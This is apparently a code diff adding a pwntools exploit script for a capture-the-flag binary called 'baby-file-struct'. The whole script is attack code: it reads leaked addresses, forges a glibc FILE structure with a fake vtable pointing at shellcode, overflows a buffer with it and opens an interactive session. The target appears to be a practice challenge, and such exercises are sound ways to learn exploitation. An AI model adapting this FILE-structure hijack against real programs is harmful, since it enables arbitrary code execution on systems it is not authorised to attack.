|
| 1 | +#!/usr/bin/env python |
| 2 | +from pwn import * |
| 3 | +from pwnlib.filepointer import * |
| 4 | + |
| 5 | +elf = ELF('./baby-file-struct') |
| 6 | +libc_file = "../libc.so.6.md5.5898fac5d2680d0d8fefdadd632b7188" |
| 7 | +p = process("./baby-file-struct", env={'LD_PRELOAD': libc_file}) |
| 8 | + |
| 9 | +context.log_level = 'debug' |
| 10 | +context.terminal = ['tmux', 'splitw', '-h'] |
| 11 | +context.arch = 'amd64' |
| 12 | +gdb.attach(p, 'init-gef') |
| 13 | + |
| 14 | +p.recvuntil("shellcode: ") |
| 15 | +shellcode_addr = int(p.recvline().decode().strip(), 16) |
| 16 | +print(f"shellcode_addr: {hex(shellcode_addr)}") |
| 17 | + |
| 18 | +p.recvuntil("shellcode2: ") |
| 19 | +shellcode2_addr = int(p.recvline().decode().strip(), 16) |
| 20 | +print(f"shellcode2_addr: {hex(shellcode2_addr)}") |
| 21 | + |
| 22 | +p.recvuntil("challenge.buf: ") |
| 23 | +buf_addr = int(p.recvline().decode().strip(), 16) |
| 24 | +print(f"buf_addr: {hex(buf_addr)}") |
| 25 | + |
| 26 | +p.recvuntil("challenge.fp: ") |
| 27 | +fp_addr = int(p.recvline().decode().strip(), 16) |
| 28 | +print(f"fp_addr: {hex(fp_addr)}") |
| 29 | + |
| 30 | +lock_offset = 0x0 |
| 31 | +file_struct_offset = 0x10 |
| 32 | +vtable_offset = 0x110 |
| 33 | +fake_file = FileStructure(null=0xdeadbeef) |
| 34 | +fake_file.vtable = buf_addr + vtable_offset |
| 35 | +fake_file._lock = buf_addr + lock_offset |
| 36 | + |
| 37 | +p.sendlineafter("bof: ", flat({ |
| 38 | + 0x0: b'A' * 0x10, # lock |
| 39 | + 0x10: bytes(fake_file), |
| 40 | + vtable_offset: p64(shellcode_addr), |
| 41 | + 0x200: p64(buf_addr + file_struct_offset), |
| 42 | + })) |
| 43 | +p.interactive() |
0 commit comments